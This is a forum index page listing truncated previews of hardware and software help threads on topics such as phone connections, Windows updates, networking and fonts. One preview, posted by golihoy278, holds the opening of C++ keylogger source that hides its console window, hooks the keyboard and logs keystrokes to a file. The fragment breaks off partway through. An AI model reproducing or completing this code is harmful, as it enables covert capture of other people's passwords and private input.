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Member Avatar for emamothelegend
Member Avatar for samiouwll222
Member Avatar for ymh07900

Dear all I'm trying to track down the name/existence of software that I used in 1999 to 'write' a financial reporting system - it was a curious mix of spreadsheet with programming capability... Would any of you know about this? Its name was similar (-ish) to Visual Basic, but it …

Member Avatar for Reverend Jim
Member Avatar for Reverend Jim

I just bought a Figo Nitro 4X cell phone (Android 8.1) phone for my son. When I connect my cell phone (Figo Android 6) to my Windows 10 laptop it displays in file manager with an icon that I can open to see all the folders on my phone. From …

Hardware and Software android-development microsoft windows-10
Member Avatar for Reverend Jim
Member Avatar for Sinha's

Person wrote - "I can see it happening and found many cases of mobile explosions specially much frequent in Rajasthan. I can say it started there and now i am hearing from mumbai also. There were many victims died of this in last one and half month. It is not …

Member Avatar for Arpan_3
Member Avatar for Dani

Earlier today, I was in need of an easy way to delete files that mached a specific format within a series of folders. For the case of this example, let's say all CSS files. I discovered I could do it with: find . -name '*.css' -delete The . represents the …

Member Avatar for Sohaib_7
Member Avatar for lordrt

Hello, I currently have a RedHat Linux version 6.4 running on a physical server (HP). However, recently it has started to show a failing disk problem, with some failures at software level as well like the terminal not opening properly, and while waiting for a new replacement disk to be …

Member Avatar for Sohaib_7
Member Avatar for pratibha91

What is file shredder and does Windows 10 have a file shredder or we need to download some third party software?

Member Avatar for Gennry
Member Avatar for golihoy278

#define _WIN32_WINNT 0x0500 #include<fstream> #include<windows.h> #include<winuser.h> using namespace std; void stealth(){ HWND stealth; AllocConsole(); stealth = FindWindowA("ConsoleWindowClass",NULL); ShowWindow(stealth,0); } ofstream out("keys.txt", ios::out); LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam) { PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam); // If key is being pressed if (wParam == WM_KEYDOWN) { switch (p->vkCode) { …

Member Avatar for vincity

i need use google bussiness to control my restaurant .. i hope anyone can help me tks

Member Avatar for maheshjtp
Member Avatar for efmesch

After my desktop computer was updated in March 2020 (Win 10 home automatic update), it lost the ability to communicate with my home network. The network is detectable and functions properly with my laptop --it's only the desktop computer that can't detect or connect to the network. I\ve tried many …

Member Avatar for William_54
Member Avatar for NuGG

Ok this is a weird one and its been ongoing for many months, wondering if anyone has any ideas. We have 10-15 office 365 exchange email accounts and they all work perfectly fine apart from one account on one device. This particular account has intermittent issues with sending and emails …

Member Avatar for NuGG
Member Avatar for Chris Morris

My business idea is about networking, can one tell me about which devices is suitable for internet conectivity for small and corporate companies

Member Avatar for rproffitt
Member Avatar for tun712

I h've created custom font in **Adobe Illustrator** for my client. My client want to use it on **windows** as well as his **website**. I used some website to convert font from **.ai** &** .svg** font to **.ttf** they are creating .ttf file but it is **not accessible** by **windows**. …

Member Avatar for SteveRocknrolla
Member Avatar for Yusuf_13

basically my sister had a ipad ,and she was using for a long time and was enjoying using it and she forgot her ipad password. there was no way to reset the password without going to shop and we couldn't be bothered to take to pc store to reset the …

Member Avatar for Yusuf_13
Member Avatar for kevinzaco

I have tried several times to make ssd bootable. Was successful. But I have never found my SSD in the boot list option. Has anyone experienced anything similar?

Member Avatar for Yusuf_13
Member Avatar for Rushikesh_6
Member Avatar for iamdarkknight
Member Avatar for saif_15
Member Avatar for Dani
Member Avatar for leahodoran

I woke up this morning and only half of my computer screen is up the other half has the "start" icon and the address bars that show what programs that I have running, it also has the time and date. My daughter was playing Webkinz last night, as she always …

Member Avatar for Barbara_2
Member Avatar for strand0617

My machine has been infected with the golden palace casino trojan. I am unable to remove and was wondering if anyone had any ideas on how to remove it. Thanks:sad:

Member Avatar for jastintrudo
Member Avatar for ringtones123

How can we use an mp3 song for a ringtone, we used to be able to use it on Windows 6.5, are we unable to find any details about it anywhere on Windows 7 mobile phones and there are no choices in the phone's music side to set it as …

Member Avatar for usman_24
Member Avatar for Innocent_8

I have a website and I want to change the index.php and it is not working each time I add htaccess file code it will stop me from loging in as admin.

Hardware and Software apache apple cybersecurity
Member Avatar for AndreRet
Member Avatar for wayne_owens

Ok. This might be a little long winded but i will try to give as much information as possilbe. I started with Office 2003 and then tried the 2007 Student trial version. When it expired I could not get it to uninstall so I dealt with the annoying problem until …

Member Avatar for PIYUSH_8
Member Avatar for bugeyes

I know I'm properly connected to the internet and there aren't any problems there however everytime I try to log in to my hotmail account an error page shows up saying this page cannot be displayed. No matter how many times I try to log in the error page always …

Member Avatar for amcdcr
Member Avatar for JamesCherrill

Hi Guys. I knw what I want to achieve but not how to achieve it! Any hints would be gratefuly received, or, if it's not possible, tell me so I can stop trying. I have an internet connection -> router with NAT, DHCP etc -> LAN with all kinds of …

Member Avatar for Malkovich
Member Avatar for Gabriel9999

I have a Java installation and I have only access via bash. How can I check the Java version from command line.

Member Avatar for AlVest
Member Avatar for Nick_10

Hi all! I have recently attended to my sister's wedding and helped her record some happy interesting videos with my panasonic camcorder, and she wants me to send those movies to her so that she can keep it in her iPhone. I found files are all ended with .ts. In …

Hardware and Software iphone
Member Avatar for william0ffil512
Member Avatar for happygeek

If the schools that my kids attend are anything to go by, it seems that high on Santa's list this Xmas just gone was an iTouch, iPhone or iPad depending how well off the parents were. That's understandable, they are just as attractive as gadgets for kids as they are …

Member Avatar for luka98
Member Avatar for Dole_1

I have been going through assembly tutorials to understand how computers function at low level. I learned most of the standard x86/64 CPU instructions, but also still did not get all the answers, mostly relating to accessing the I/O and other hardware. So I have perhaps a somewhat silly question …

Member Avatar for rproffitt
Member Avatar for Abdullah_29

I was trying to upgrade to windows 10 from windows 7 ultimate. But when the setup completes installing windows 10 and it restarts nothing happens and my previous window 7 starts again. Like nothing happened. Neither any drive space is eaten up after the install. I know if i clean …

Member Avatar for rproffitt

The End.